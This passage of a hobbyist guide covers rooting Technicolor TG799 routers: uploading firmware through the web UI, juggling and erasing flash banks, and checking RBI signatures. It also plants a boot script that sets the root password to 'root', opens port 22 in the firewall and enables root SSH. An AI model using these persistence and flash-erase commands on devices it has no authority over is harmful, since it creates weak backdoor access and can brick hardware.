  -H 'Cookie: sessionID=0cba5e09a4e286ec6d9411538cf156f26a7530925c7107c78c1d5413b0727e7f' \
  -F 'CSRFtoken=<token>' \
  -F '<file-field-name>=@<firmware.rbi>' \
  --compressed
curl 'http://192.168.1.1/modals/gateway-modal.lp?action=upgradefwstatus' \
  -H 'Connection: keep-alive' \
  -H 'Accept: application/json, text/javascript, */*; q=0.01' \
  -H 'User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.82 Safari/537.36' \
  -H 'X-Requested-With: XMLHttpRequest' \
  -H 'Referer: http://192.168.1.1/gateway.lp' \
  -H 'Accept-Language: en-GB,en-US;q=0.9,en;q=0.8' \
  -H 'Cookie: sessionID=0cba5e09a4e286ec6d9411538cf156f26a7530925c7107c78c1d5413b0727e7f' \
  --compressed \
  --insecure

Current bank setup:

grep . -r /proc/banktable/
/proc/banktable/notbootedoid:Unknown
/proc/banktable/bootedoid:5dcd7b8d4f5d980688c30569
/proc/banktable/passiveversion:17.2.0405-1441042-20191114170637-ec29699cbbf5c66c53b310489f62a141f46bf628
/proc/banktable/activeversion:Unknown
/proc/banktable/inactive:bank_2
/proc/banktable/active:bank_1
/proc/banktable/notbooted:bank_1
/proc/banktable/booted:bank_2

Setup Ultimate Bank Plan

This script (taken from the hack-technicolor documentation linked at the end) clones bank_1 into bank_2 when bank_1 is the booted bank, moves the overlay over to bank_2, marks bank_1 active and then erases it, so the device ends up booting bank_2 while bank_1 is marked active, which is exactly the /proc/banktable state shown above. It erases a bank, so read it before running it:

# Ensure two banks match in sizes
[ $(grep -c bank_ /proc/mtd) = 2 ] && \
[ "$(grep bank_1 /proc/mtd | cut -d' ' -f2)" = \
"$(grep bank_2 /proc/mtd | cut -d' ' -f2)" ] && {
[ "$(cat /proc/banktable/booted)" = "bank_1" ] && {
mtd -e bank_2 write /dev/$(grep bank_1 /proc/mtd | cut -d: -f1) bank_2 && \
mtd verify /dev/$(grep bank_1 /proc/mtd | cut -d: -f1) bank_2 || \
{ echo Clone verification failed, retry; exit; } }
cp -rf /overlay/$(cat /proc/banktable/booted) /tmp/bank_overlay_backup
rm -rf /overlay/*
cp -rf /tmp/bank_overlay_backup /overlay/bank_2
echo bank_1 > /proc/banktable/active
sync
mtd erase bank_1;
echo c > /proc/sysrq-trigger; }

Checking RBI firmware signature

On the router, signature_checker verifies an RBI, optionally against another board's key (.osik):

signature_checker -b /tmp/firmware_to_check.rbi [-k /tmp/other_board_to_check.osik]

To run the same check on a PC, extract a decrypted firmware with binwalk, drop the RBI and the key into the extracted root, and run signature_checker through qemu-arm-static in a chroot:

binwalk -e any_decrypted_firmware.bin
mv firmware_to_check.rbi pubkey_to_check.osik _any_decrypted_firmware.bin.extracted/squashfs-root/tmp/
cd _any_decrypted_firmware.bin.extracted/squashfs-root
cp $(which qemu-arm-static) .
sudo chroot . ./qemu-arm-static /usr/bin/signature_checker -b /tmp/firmware_to_check.rbi -k /tmp/pubkey_to_check.osik

Extract RBI, flash it and preserve SSH access


Unpack the RBI file:

cat "/tmp/new.rbi" | (bli_parser && echo "Please wait..." && (bli_unseal | dd bs=4 skip=1 seek=1 of="/tmp/new.bin"))

Setup SSH access

mkdir -p /overlay/$(cat /proc/banktable/booted)/etc
chmod 755 /overlay/$(cat /proc/banktable/booted) /overlay/$(cat /proc/banktable/booted)/etc
echo -e "echo root:root | chpasswd
sed -i 's#/root:.*\$#/root:/bin/ash#' /etc/passwd
sed -i -e 's/#//' -e 's#askconsole:.*\$#askconsole:/bin/ash#' /etc/inittab
uci -q set \$(uci show firewall | grep -m 1 \$(fw3 -q print | \
egrep 'iptables -t filter -A zone_lan_input -p tcp -m tcp --dport 22 -m comment --comment \"!fw3: .+\" -j DROP' | \
sed -n -e 's/^iptables.\+fw3: \(.\+\)\".\+/\1/p') | \
sed -n -e \"s/\(.\+\).name='.\+'$/\1/p\").target='ACCEPT'
uci add dropbear dropbear
uci rename dropbear.@dropbear[-1]=afg
uci set dropbear.afg.enable='1'
uci set dropbear.afg.Interface='lan'
uci set dropbear.afg.Port='22'
uci set dropbear.afg.IdleTimeout='600'
uci set dropbear.afg.PasswordAuth='on'
uci set dropbear.afg.RootPasswordAuth='on'
uci set dropbear.afg.RootLogin='1'
uci set dropbear.lan.enable='0'
uci commit dropbear
/etc/init.d/dropbear enable
/etc/init.d/dropbear restart
rm /overlay/\$(cat /proc/banktable/booted)/etc/rc.local
source /rom/etc/rc.local
" > /overlay/$(cat /proc/banktable/booted)/etc/rc.local
chmod +x /overlay/$(cat /proc/banktable/booted)/etc/rc.local
sync

Then flash the firmware.

Erase and write the new firmware into the booted bank. For example, when bank_2 is the booted bank, that is:

mtd -e bank_2 write /tmp/new.bin bank_2

or generically:

mtd -e $(cat /proc/banktable/booted) write "/tmp/new.bin" $(cat /proc/banktable/booted)

This overwrites the bank the running system was loaded from, so a normal shutdown cannot be relied on; emulate a system crash to hard reboot instead:

echo c > /proc/sysrq-trigger

Backing up configuration

tar -C /overlay -cz -f /tmp/backup-$(date -I).tar.gz $(cat /proc/banktable/booted)

Use the command below to manually create an archive with all your modified files from both firmware banks:

tar -C /overlay -cz -f /tmp/overlay-files-backup-$(date -I).tar.gz bank_1 bank_2

If you prefer, you can rely on sysupgrade to achieve a similar result for the booted bank only.

To save the Config:

sysupgrade -i -b /tmp/sysupgrade-backup-$(date -I).tar.gz

To restore the Config:

sysupgrade -f /tmp/sysupgrade-backup-*.tar.gz

Turn on the green power LED:

echo 1 > /sys/class/leds/power:green/brightness

Turn off the red power LED:

echo 0 > /sys/class/leds/power:red/brightness

Setup permanent SSH access (dropbear bound to the LAN interface only; the root password is still root from the rc.local above, so change it with passwd before relying on this):

uci -q delete dropbear.afg
uci add dropbear dropbear
uci rename dropbear.@dropbear[-1]=afg
uci set dropbear.afg.enable='1'
uci set dropbear.afg.Interface='lan'
uci set dropbear.afg.Port='22'
uci set dropbear.afg.IdleTimeout='600'
uci set dropbear.afg.PasswordAuth='on'
uci set dropbear.afg.RootPasswordAuth='on'
uci set dropbear.afg.RootLogin='1'
uci commit dropbear
/etc/init.d/dropbear enable
/etc/init.d/dropbear restart

Some other URLs for TG799 hacking, you all rock \m/ -_- \m/

https://weaponizedautism.wordpress.com/2017/07/14/vulnerabilities-in-technicolor-adsl-residential-gateways/
https://hack-technicolor.readthedocs.io/
https://forums.whirlpool.net.au/archive/2650998
https://www.crc.id.au/hacking-the-technicolor-tg799vac-and-unlocking-features/
https://full-disclosure.eu/reports/2019/FDEU-CVE-2019-10222-telia-savitarna-backdoor.html

CONTACT

If you have problems, questions, ideas or suggestions please contact
us by posting to wuseman@nr1.nu

WEB SITE

https://wuseman.nr1.nu

https://nr1.nu 

END!